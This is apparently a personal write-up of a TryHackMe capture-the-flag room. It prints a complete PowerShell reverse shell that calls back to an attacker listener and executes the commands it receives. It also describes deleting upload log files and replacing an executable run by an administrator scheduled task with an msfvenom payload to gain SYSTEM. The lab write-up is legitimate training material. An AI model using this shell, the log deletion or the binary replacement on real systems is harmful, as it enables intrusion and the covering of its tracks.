TryHackMe

Difficulty: Medium

Are you stealthier enough to evade all the updated security measures of the target?

visit 10.66.133.142:8080 to pwn the machine.

The Challenge

#

This seems to be an av evasion challenge. We visit the target web page and are met by a page with upload functionality detailing:

Please upload any .ps1 PowerShell script to see if it is malicious or 
not (Dev Mode). The tool is in dev-mode and only allow .ps1 format at 
this stage.

Reverse shell

#

we upload a ps1 reverse shell

$lhost="192.168.134.8";
$lport=4444;
$MAXCMDLENGTH=65535;
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
$bytes = (New-Object byte[] $MAXCMDLENGTH);
$out = ([text.encoding]::ASCII).GetBytes("PS $($pwd.Path)> ");
$stream.Write($out, 0, $out.Length);
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $in = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
    try {
        $out = (iex $in 2>&1 | Out-String);
    }
    catch {
        $out = ($_ | Out-String);
    }
    $out = "$($out)PS $($pwd.Path)> ";
    $out = ([Text.Encoding]::ASCII).GetBytes($out);
    $stream.Write($out, 0, $out.Length);
    $stream.Flush();
}
$client.Close();

Start a listener

And we receive a connection. No av detection so far.

We land in ~/evader/documents and find log.txt and file.ps1 inside of the Task Directory. log.txt reveals a file called vulnerable.ps1

We note that the file vulnerable.ps1 exists and will look at it later, for now we want our flag.

We move to desktop to search for the user flag. where we find an encoded flag.

Copying the output of encodedflag into cyberchef and using auto bake it is decoded.

After following the link we are met with a site with this text

We have a hint, we know we must remove log files related to file uploads

lets search for any log files, related to uploads.

This is where I took a break. The new vm ip is 10.66.135.186

When I came back I re-evaluated where I was. we know we must delete log files related to the uploads. I started back where we landed, In documents, went to the task folder and read log.txt. we saw log.txt has been modified in the log.txt so we do a quick filesystem search for log.txt

And we find a log.txt file inside of the uploads directory of our web app.

Lets remove it and see what happens

Then we revisit the page where we are met with our user flag

I thought this was a room about av evasion but so far we haven’t had to do any obfuscation.

Privilege escalation

#

Lets try to escalate to system to get our root flag. Im going to try to upload privesccheck.ps1 and see if it gets blocked by defender

It successfully ran, lets check our results

We have a couple of high severity vulnerabilities.

We have a couple of high severity vulnerabilities, But the one that sticks out to me the most is MYTHMTask in the system32 file path running as administrator.

We see the task THMTask runs as administrator and executes the command C:\xampp\DebugCrashTHM.exe

Since we have write access to xampp we can just replace the exe with a malicious one and run the service to execute it.

We can use msfvenom to generate an exe reverse shell, transfer it to our target machine and save it as the same name as the original executable.

Then we start our listener and manually execute the task (or wait for the next time it runs)

Now we are system and can get our root flag

This was a good machine overall, pretty easy. Im not sure what the stealthy part was about, maybe I didn’t do this machine the way it was intended. Either way the machine is complete and I reinforced my learning.